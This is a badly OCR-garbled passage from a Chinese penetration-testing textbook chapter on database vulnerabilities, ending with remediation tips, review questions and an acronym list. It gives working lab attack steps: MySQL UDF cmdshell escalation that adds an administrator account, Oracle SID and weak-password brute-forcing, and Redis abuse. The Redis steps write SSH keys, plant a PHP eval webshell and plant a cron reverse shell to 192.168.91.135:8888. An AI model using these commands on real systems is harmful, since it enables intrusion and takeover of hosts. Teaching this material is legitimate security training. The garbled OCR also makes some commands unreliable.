所 示 。 


mysql» select @@version; 


mysql» show variables like 'iplugint'; 


| plugin dir | C:\Program FilesVphpStudyVMySQLVlibYplugim | 
|+--------------- +---------------------------------------------: + 


1 row in set 


图 13-11 MySQL 版 本 是 5.5.53 图 13-12 查看 导出 路 径 
(8) 将 DLL 文件 导出 ,uudf. dll 的 名 字 可 以 任意 命名 : 


select data from my udf data into DUMPFILE 'C:/Program Files/phpStudy/MySQL/ 
lib/plugin/ uudf.dll'; 


结果 如 图 13-13 所 示 。 
mysql» select data from my udf data into DUMPFILE 'C:/Program Files/phpS 
tudy/MySQL/ Lib/plugin/uudf.dll'; 
ery OK, 1 row affected 
Æ 13-13 dll 导出 
(9) 创建 cmdshell, cmdshell 的 名 字 不 能 随意 更 改 : 


create function cmdshell returns string soname 'uudf.dll'; 


结果 如 图 13-14 所 示 。 


mysql» create function cmdshell returns string soname 'uudf.dll'; 
Query OK, 0 rovs affected 


13-14 ”创建 cmdshell 


(10) 通过 cmdshell 进行 提 权 。 添 加 用 户 x, 并 将 x 添加 到 管理 员 用 户 组 中 (用 户 x 
提 权 ) : 


select cmdshell ('net user x x /add'); 
select cmdshell ('net localgroup administrators x /add'); 


结果 如 图 13-15 所 示 。 
(OD 利用 添加 的 x 用 户 可 以 正常 登录 到 远程 服务 器 ,如 图 13-16 所 示 。 
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mysql» select cmdshell('net user x x /add'); 


1 row in set 


mysql» select cmdshell('net localgroup administrators x /add'); 


1 rov in set 


图 13-15 添加 用 户 x 并 提 权 


E 管理 您 的 服务 器 


管理 您 的 服务 器 — e) 


服务 器 : TEST-B9EDF20207 


工具 和 更 新 T) 
管理 您 的 服务 器 角色 - = 
massa Rum —usmagpape,, HATEN EY smtupane p 

€) 阅 过 有 关 服务 器 角色 的 信 | 更 多 工具 
息 Windows Update 
€) 辣 素 关于 远程 管理 的 信息 。 。 计算 机 和 域名 称 信息 
您 的 服务 器 已 经 用 下 列 角 色 进 行 了 配置 Internet Explorer 增强 的 安 

全 配置 

4 应 用 程序 服务 器 
BRETRSEAMUE BENEA ULYA RE, ' 请 参阅 到) 
Web 应 用 程序 和 分 布 式 应 用 程序 所 必须 的 核心 技术 ， 管理 此 应 用 程序 服务 器 


程序 服务 器 技术 包括 ASP.NET, COMH 和 Internet "WER o BEEN 帮助 和 支持 
务 GTS)。 信 Microsoft TechNet 


Meo ra BSS 部署 和 次 
dM Pt Meum 


信息 常见 管理 任务 列表 
9) 复查 此 角色 的 下 一 步 Windows Server 社区 
新 内 容 
战略 性 技术 保护 计划 


图 13-16 x 用 户 可 以 正常 登录 到 远程 服务 器 
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— 13.3 Oracle 数据 库 漏 洞 


本 节 介 绍 Oracle 9i 数据 库 提 权 。 


1. 获取 数据 库 版 本 及 SID 

获取 数据 库 版 本 及 SID 的 过 程 如 下 。 

CD 获取 数据 库 版 本 。 利 用 Nmap 的 sV 参数 可 以 扫描 应 用 的 指纹 信息 ,通过 扫描 可 
以 获取 此 数据 库 的 版 本 为 9. 2. 0. 1.0。 


nmap -sV -p 1521 -v 192.168.91.108 

Completed NSE at 16:04, 0.00s elapsed 

Nmap scan report for 192.168.91.108 

Host is up (0.00088s latency). 

PORT STATE SERVICE VERSION 

1521/tcpopen oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows) 


(2) 获取 数据 库 SID。 利 用 Nmap 自 带 脚本 oracle-sid-brute 暴力 猜 解 SID ,只 要 是 爆 
破 就 与 字典 有 关 , 字 典 文件 在 Nmap\nselib\data\oracle-sids 中 。 通 过 爆破 获取 Oracle 的 
SID 为 CTFS。 


nmap -p 1521 --script oracle-sid-brute 192.168.91.108 
Host is up (0.00s latency). 

PORT STATE SERVICE 

1521/tcp open oracle 

| oracle-sid-brute: 

I CIES 

MAC Address: 00:0C:29:50:14:7E (VMware) 


2. 弱 口 令 爆破 

利用 Metasploit 进行 Oracle 弱 口 令 爆 破 ,也 可 以 利用 Metasploit 获取 数据 库 版 本 
及 SID。 

(1) 利用 auxiliary/scanner/oracle/sid brute 获取 SID 信息 , 其 中 /usr/share/ 
metasploit-framework/data/ wordlists/sid. txt 为 字典 库 ,如 图 13-17 所 示 。 

(2) 设置 目标 地 址 RHOSTS, 然 后 执行 run 命令 ,开始 爆破 ,获取 SID 为 CTFS, 如 
图 13-18 所 示 。 

(3) 使 用 auxiliary/scanner/oracle/oracle_login 模块 进行 弱 口令 破解 ,发 现存 在 用 户 
名 scott 和 密码 tiger。 


[* ] Nmap: | dmsys:dmsys -Account is locked 
[*] Nmap: | outlin:outln -Account is locked 
[*] Nmap: | dip:dip -Account is locked 
[*] Nmap: | rla:rla -Account is locked 
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[* ] Nmap: | sap:sapr3 -Account is locked 
[*] Nmap: | secdemo:secdemo -Account is locked 


[* ] Nmap: | scott:tiger -Valid credentials 


图 13-17 sid brute 模块 参数 


fx} 
[*] 
i*J 
[*] 
t) 


Checking 572 SIDs against 192.1 

21 - Oracle - 
- Oracle - 'LINUX8174' 
- Oracle - Checking 'ORACLE'... 
- Oracle - Refused 'ORACLE' 


[£1 Oracle - Checking 'CTFS'... 
[e$] - 0 Oracle - 'CTFS' is valid 

[*] < 91.108:1521 - Oracle - Checking 'XE'... 
[*] š 91.108:1521 - Oracle - Refused 'XE' 


.108:1521 $ 
.108:1521 - 


[*] 


[*1 


91.108:1521 - Oracle - ecking 'ASDB'... 
.91.108:1521 - Oracle - Refused 'ASDB" 


图 13-18 获取 SID 为 CTFS 


3. 远程 连接 数据 库 并 查看 权限 
CD 利用 sqlplus 进行 远程 连接 : 


sqlplus scott/tiger@192.168.91.108:1521/ctfs 


(2) 查看 scott 用 户 权 限 , 发 现 scott 只 有 CONNECT 和 RESOURCE 权限 ,没有 
DBA 权限 。 


SQL>select * fromuser role privs; 


USERNAME GRANTED ROLE ADM DEF OS_ 
SCOTT CONNECT NO YES NO 
SCOTT RESOURCE NO YES NO 
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4. 提 权 并 添加 用 户 
提 权 并 添加 用 户 的 过 程 如 下 。 
D 创建 包 : 


(2) 创建 包 主体 : 
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mum Web £ £ 8 3 2-4 5 > k, m 


(3) 提 权 。 再 次 查看 SCOTT 用 户 的 权限 ,发现 他 已 经 拥有 DBA 的 权限 。 


(4) 创建 存储 过 程 ,进行 提 权 : 


5. 添加 用 户 并 提升 为 管理 员 
断 开 当 前 连接 ,重新 登录 后 输入 以 下 提 权 语句 : 


然后 测试 远程 登录 ,发 现 可 以 用 ctfs 用 户 登录 ,如 图 13-19 所 示 。 
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V5 192.168.91.108 - 远程 桌面 连接 


图 13-19 ctfs 用 户 登 录 


OBA Redis 数据 库 未 授权 访问 漏洞 


Redis 是 非 关 系 型 数据 库 , 是 一 种 使 用 ANSI C 语言 编写 的 日 志 型 .Key-Value 形式 
的 开源 数据 库 , 它 提供 多 种 语言 的 API, Redis 的 标识 如 图 13-20 . 
所 示 。 e redis 
Redis 默认 安装 ,启动 后 会 绑 定 6379 端口 ,并 且 在 默认 安装 
情况 下 没有 口令 ,这 样 就 可 以 通过 6379 端口 直接 与 Redis 连接 ， 图 1320 Redis 的 标识 
进行 数据 读 取 和 文件 写 人 的 操作 。 
Redis 数据 库存 在 未 授权 访问 漏洞 。 利 用 Redis 数据 库 客户 端 直接 连接 Redis 数据 
BE ,利用 此 漏洞 可 以 获取 敏感 信息 、 获 取 主 机 权限 、 写 人 Webshell\ 反 弹 shell 等 。 


13.4.1 Redis 数据 库 未 授权 访问 环境 搭建 


操作 系统 为 CentOS release 6.8 (Final) 。 
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安装 步骤 如 下 : 
CD 利用 yum 安装 Redis ,命令 如 下 : 


(2) 安装 完成 后 ,修改 redis. conf ,将 默认 的 绑 定 IP 地 址 改 为 0. 0. 0. 0, 将 bind 参数 
修改 为 bind 0. 0. 0.0。 

(3) 修改 Redis 启动 用 户 。 

(4) 启动 Redis 服务 ,命令 如 下 : 


查看 Redis 权限 ,发 现 权 限 是 redis。 


如 果 是 普通 权限 用 户 ,无 法 在 其 他 敏感 目录 下 写 和 人 修改 文件 。 为 了 后 面 的 测试 ,要 将 
Redis 的 启动 用 户 改 为 root, 修 改 /etc/rc. d/init. d/redis 文件 ,将 ${REDIS_USER-redis} 


重启 Redis 服务 后 ,发 现 启 动用 户 变 为 root。 


连接 Redis 数据 库 ,输入 redis-cli -h 127. 0. 0. 1 ,输入 info, 如 果 能 看 到 Redis 相关 信 
息 ,就 说 明 Redis 数据 库 未 授权 访问 环境 已 经 搭建 成 功 了 。 


mum 314 um 


m—— 第 13 章 数据 库 漏洞 。 www 


13.4.2 利用 Redis 未 授权 访问 漏洞 获取 敏感 信息 


1. 通过 info 获取 服务 器 信息 
通过 info 获取 服务 器 的 Redis 数据 库 配 置 \.CPU、 内 存 等 敏感 信息 。 
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mem allocator:jemalloc-3.6.0 


# Persistence 

loading:0 
rdb_changes_since_last_save:0 
rdb_bgsave_in_progress:0 
rdb_last_save_time:1525501232 
rdb_last_bgsave_status:ok 
rdb_last_bgsave_time_sec:-1 
rdb_current_bgsave_time_sec:-1 
aof_enabled:0 

aof rewrite in progress:0 

aof rewrite scheduled:0 


2. 查看 key 和 password 值 
通过 keys x 命令 发 现存 在 3 个 key: password, name, key, 


192.168.91.142:6379>keys * 
1) "password" 

2) "name" 

3) "key" 


通过 get password 命令 发 现 password 的 值 为 passpass。 


192.168.91.142:6379>get password 
"passpass" 


13.4.8 利用 Redis 未 授权 访问 漏洞 获取 主机 权限 


1. 漏洞 利用 的 原理 

利用 Redis 数据 库 持 久 化 存储 可 以 写 和 文件 的 功能 ,将 自己 的 公 钥 写 入 远程 Linux 
系统 的 /root/. ssh 文件 夹 的 authotrized_keys 文件 中 ,然后 通过 自己 的 私 钥 免 密码 登录 
到 目标 Linux 系统 。 

1) Redis 持久 化 存储 

Redis 的 数据 是 存储 在 缓存 之 中 的 ,但 是 缓存 可 能 存在 数据 丢失 的 问题 ,所 以 将 
Redis 的 数据 进行 持久 化 存储 非常 重要 。 

常见 的 持久 化 存储 方式 为 snapshot 方式 ,通过 将 当前 内 存 中 的 数据 快照 周期 性 地 写 
A. RDB 文件 来 实现 ,这 样 就 可 以 进行 文件 的 写 入 。 

通过 config set dir /root/. ssh/ 命 令 设 置 数 据 库 的 默认 路 径 为 /root/. ssh/ , 

通过 config set dbfilename "authorized keys" 命令 设 置 数 据 库 的 缓存 文件 为 
authorized_keys, 这 样 就 可 以 把 公 和 钥 写 人 authorized keys 文件 中 了 。 

2) Linux 公私 钥 登 录 原 理 

Linux 系统 既 支 持 用 户 名 、 密 码 的 登录 方式 ,也 支持 公私 钥 登 录 方 式 。 公 私 钥 登 录 的 
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原理 是 : 通过 密 钥 生 成 器 制作 一 对 密 钥 : 一 个 公 钥 id_rsa. pub 和 一 个 私 钥 id_rsa, 将 生 
成 的 公 钥 id_rsa. pub 的 内 容 添加 到 远程 服务 器 的 authorized keys 文件 的 末尾 ,然后 客户 
端 就 可 以 通过 私 钥 免 密 码 登录 到 远程 服务 器 。 当 然 , 只 有 远程 Linux 服务 器 允许 公私 钥 
登录 , 才 可 以 用 公私 角形 式 登 录 。 


2. 漏洞 利用 的 条 件 

Redis 利用 公私 钥 登 录 获 取 主 机 权限 的 条 件 如 下 : 
(1) Redis 在 服务 器 中 是 以 管理 员 权限 启动 的 。 
(2) 服务 器 中 开启 了 SSH 公私 钥 登 录 方 式 。 

(3) Redis 存在 未 授权 访问 或 者 弱 口 令 漏 洞 。 


3. 漏洞 利用 的 步骤 

Redis 未 授权 访问 获得 主机 权限 漏洞 利用 步骤 如 下 : 

(1) 在 自己 的 系统 生成 密 钥 对 ,可 以 用 Kali, CentOS, Ubuntu 等 Linux 系统 ,也 可 以 
用 xshell 等 SSH 客户 端 ,只 要 能 生成 密 钥 对 即 可 。 


[root@host ~]#ssh- keygen // 建 立 密 钥 对 
Generating public/private rsa key pair. 
Enter file in which to save the key (/root/.ssh/id rsa): // 按 Enter 键 
Created directory '/root/.ssh'. 
Enter passphrase (empty for no passphrase): 

// 输 入 密 钥 锁 码 ,或 直接 按 Enter 键 留 空 
Enter same passphrase again: // 再 输入 一 遍 密 钥 锁 码 
Your identification has been saved in /root/.ssh/id rsa。// 私 钥 
Your public key has been saved in /root/.ssh/id rsa.pub. // 公 钥 
The key fingerprint is: 
0£:d3:e7:1a:1c:bd:5c:03:£1:19:£1:22:d£:9b:cc:08 root8host 


(2) 将 公 钥 写 和 人 test. txt 文件 中 : 


[rootehost ~]# (echo -e "Ann"; cat /root/.ssh/id rsa.pub; echo -e "\n\n") > 
test.txt 


(3) 通过 Redis 客户 端 连 接 Redis 并 将 test. txt 文件 中 的 公 钥 内 容 写 人 Redis 数据 库 
crackit 的 键 值 中 。 


root@kali:~/.ssh#cat test.txt | redis-cli -h 192.168.91.142 -x set crackit 
OK 


(4) 连接 数据 库 之 后 ,保存 数据 库 。 


root@kali:~/.ssh#redis-cli -h 192.168.91.142 
192.168.91.142:6379» save 

OK 

192.168.91.142:6379» 
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发 现 公 钥 内 容 已 经 存 人 到 数据 库 文件 dump. rdb 中 。 


[root@d911217acdfe /]#cat /var/lib/redis/dump.rdb 
REDIS0007 redis-ver3.2.11 
redis-bits? .time 满 x.used-mem?h 

-crackitA 


ssh-rsa AAAAB3NzaClyc2EAAAADAQABAAABAQCvmFjK7SzO0EzuhVv9PlbqyPm/u7dlT1CL40 
pfE6vCnT204FG2SyFyW6Pv2kriV-* 1DY* OpudeMRBLEqC95MLpz 6PKDSAdECWBCp59IUNFDbX7 
52XZ6bYdo7ItDcYpAEG3sM4oa jgmwAgGXdzRLqyaMBeIwHt 4DICdOuELYvyjk35055HAmsoIY 
Bjsf7eGkhMjdIiEYOXQwJLACUaz1/yyO* 5u9zvR3VL7Y9K/AW2v6NsPaCtV95* zD* k14kjUw 
StuUoYPCQ6FpZ2ZV4c2Z9BxRovqveMzXuNKTA2c3CRrWVgzIDJEA2DYycXe5R36HHKW6xfrjux 
/MmVlDgxQ7bAorQj rootGkali 


C5) 重新 设置 数据 库 的 默认 路 径 为 /root/. ssh/ ,保存 数据 库 文件 dump. rdb。 


192.168.91.142:6379» config set dir /root/.ssh/ 
OK 

192.168.91.142:6379» save 

OK 


发 现 文件 已 经 写 人 /root/. ssh/dump. rdb 中 。 


[root@d911217acdfe .ssh]#1s 
dump.rdb id rsa id rsa.pub 
[root@d911217acdfe .ssh]#cat dump.rdb 
REDIS0007 redis-ver3.2.11 
redis-bits? .time? y.used-mem f? 

Wr .crackitA 


ssh-rsa 
AAAAB3NzaClyc2EAAAADAQABAAABAQCvmFjK7Sz0EzuhVv9PlbqyPm/u7dlT1CLA40pfE6vCnT 
204FG2SyFyW6Pv2kriV-*1DY-* OpudeMRBLEqC95MLpz 6PKDSAdECWBCp59IUNFbX752XZ6bYdo 
"7ItDcYpAEG3sM40ajgmwAgGXdzRLqyaMBeIwHt4DICdOuELYvyjk35055HAmsoIYBjsf7eGkh 
MjdIiEYOXQwJLACUazl/yyO* 5bu9zvR3VL7Y9K/AW2v6NsPaCtV95-*zD4 k14kjUwStuUoYPCQ6 
FpZ2ZV4c2Z9BxRovqveMzXuNKTA2c3CRrWVgzIDJEA2DYycXe5R36HHKW6xfrjux/MmVlDgxQ 
"IbAorQj root8kali 


(6) 设置 数据 库 的 缓存 文件 为 authorized_keys, 保 存 数据 库 文件 authorized keys. 


192.168.91.142:6379>config set dbfilename "authorized keys" 
OK 

192.168.91.142:6379>save 

OK 


这 样 ,通过 持久 化 配置 就 把 公 钥 写 人 了 上 面 配 置 的 数据 库 文件 authorized keys 中 。 
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(7) 连接 数据 库 ,发 现 可 以 通过 私 钥 免 密码 直接 登录 目标 服务 器 。 


13.4.4 利用 Redis 未 授权 访问 漏洞 写 入 Webshell 


利用 Redis 未 授权 访问 漏洞 写 和 人 Webshell 的 步骤 如 下 : 
CD 设置 test 的 值 为 <?php GevalC$. POST[1D;?7: 


(2) 设置 数据 缓存 目录 : 


(3) 设置 数据 缓存 文件 : 


(4) 保存 ma. php: 
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C5) 在 目标 服务 器 中 发 现存 在 ma. php: 


[root@d911217acdfe html]#cat ma.php 
REDIS0007 redis-ver3.2.11 
redis-bits? .time? .used-mem? c 
.test?php Geval($ POST['1']);?» ?Yo." 


(6) 测试 木马 可 用 性 。 连 接 木 马 , 发 现 木马 可 以 正常 使 用 ,执行 phpinfo 函数 ,如 
图 13-21 所 示 。 


http//192.16891.1428080/ma php. 


EZ Enable Post data [Enable Referrer 
T=phpinfo0] 


Tedis-ver3.2.11@ redis-bits9 (0 € ctime€A€ 6 7 €used-meme (cé Otest 


[system |Unux 40fbb3e63b1 44.0-21-generic #37-Ubuntu SMP Mon Apr 18 1833:37 UTC 
|2016 »85 64 


[Build Date — |Nov7 2016 081144 
[configure enfe with eoi e poth™/um/ete wi coria ie car direuor 
D without-pear '--with-gd' '-- 


j -disable-debug' --enable-fpm -enable-bcmath ~ 
|withvapes2-« usriinfapss!"-erable-fastcgi '--with-mysq! "Ur mysql -withr 
|pdo-myeal "-wth-ibdirulibeA" 


|SeverAP! — Apache 20 Handler. 


[Virtual |disabled. 
[Directory 

[support 

[Configuration /crete 
|File. 


图 13-21 木马 正常 使 用 


13.4.5 利用 Redis 未 授权 访问 漏洞 反弹 shell 
利用 Redis 未 授权 访问 漏洞 反弹 shell 的 步骤 如 下 : 
CD 在 服务 器 上 监听 8888 端口 : 


root@kali:~#nc -lvvp 8888 
listening on [any] 8888 ... 


(2) 设置 test 的 键 值 为 * x x x x bash -i > & /dev/tcp/192. 168. 91. 135/8888 
0>&1: 


192.168.91.142:6379>set test "\n* * * * * bash -i >& /dev/tcp/192.168.91. 
135/8888 0>&1\n" 
OK 


(3) 设置 数据 存放 位 置 为 /var/spool/cron/: 
320 


m——— 第 13 章 A w 


(4) 设置 文件 名 称 为 root 并 保存 文件 : 


(5) 查看 目标 服务 器 ,发 现 /var/spool/cron/root 文件 已 经 写 人 定时 执行 命令 。 


服务 器 已 经 接收 到 了 反弹 的 shell; 


E 135 数据 库 漏洞 修复 


数据 库 漏洞 可 以 通过 以 下 几 种 方式 修复 : 

CD 将 默认 口令 、 弱 口令 、 空 口令 修改 为 复杂 口令 。 
(2) 将 数据 库 配 置 为 最 小 化 权限 。 

(3) 删除 或 禁用 不 必要 的 功能 和 组 件 。 

(4) 为 数据 库 系统 及 时 打 补 丁 , 升 级 至 最 新 版 本 。 


Ps Bam 


1. 常见 的 数据 库 有 哪些 ? 
2. 简 述 SQL Server 数据 库 提 权 的 原理 及 利用 方式 。 


mmm 32] mm 
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- SQL Server 数据 库 如 何 关闭 存储 过 程 ? 

简 述 MySQL UDF 提 权 的 原理 。 

. 简 述 MySQL UDF 提 权 的 利用 条 件 。 

. 简 述 Oracle 数据 库 提 权 的 过 程 。 

. Redis 未 授权 访问 漏洞 的 危害 有 哪些 ? 

. 简 述 在 Redis 中 利用 公私 钥 登 录 获 取 主 机 权限 的 原理 。 

. 在 Redis 中 利用 公私 钥 登 录 获 取 主 机 权限 的 条 件 有 哪些 ? 
10. 简 述 Redis 未 授权 访问 写 人 Webshell 的 步骤 。 

11. 简 述 Redis 未 授权 访问 反弹 shell 的 步骤 。 
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附录 A ”英文 缩 上 略语 


Beef Browser Exploitation Framework 浏览 器 攻击 框架 

B/S Browser/Server 浏览 器 /服务 器 

CA Certificate Authority 电子 认证 服务 

CSS Cascading Style Sheets ERES 

CVE Common Vulnerabilities & Exposures 公共 漏洞 和 暴露 
DBA Database Administrator 数据 库 管 理 员 

DNS Domain Name Service 域名 服务 

DOM Document Object Model 文档 对 象 模型 

DoS Denial of Service 拒绝 服务 

DTD Document Type Definition 文档 类 型 定义 

FTP File Transfer Protocol 文件 传输 协议 

HTTP HyperText Transfer Protocol 超 文本 传输 协议 
HTTPS HyperText Transfer Protocol Secure 超 文本 传输 安全 协议 
ICMP Internet Control Message Protocol 互联 网 控制 报 文 协议 
I/O Input/Output 输入 输出 

IP Internet Protocol 互联 网 协议 

JMX Java Management Extensions Java 管理 扩展 

JS JavaScript 一 种 直译 式 脚本 语言 

POC Proof of Concept 验证 性 测试 

SMTP Simple Mail Transfer Protocol 简单 邮件 传输 协议 
SQL Structured Query Language 结构 化 查询 语言 

SSL Secure Sockets Layer 安全 套 接 层 

SSRF Server-Side Request Forge 服务 端 请 求 伪 造 

TCP Transmission Control Protocol 传输 控制 协议 

URI Uniform Resource Identifier 统一 资源 标识 符 

URL Uniform Resource Locator 统一 资源 定位 符 

WAR Web ARchive 网 络 归 档 文件 

WebDAV Web-based Distributed Authoring and Versioning 基于 Web 的 分 布 式 编写 
和 版 本 控制 (一 种 基于 HTTP 1. 1 协议 的 通信 协议 》 

WWW World Wide Web 万 维 网 

XSS Cross-Site Scripting ” 跨 站 脚本 

XXE XML eXternal Entity XML 外 部 实体 

XML eXtensible Markup Language 可 扩展 标记 语言 
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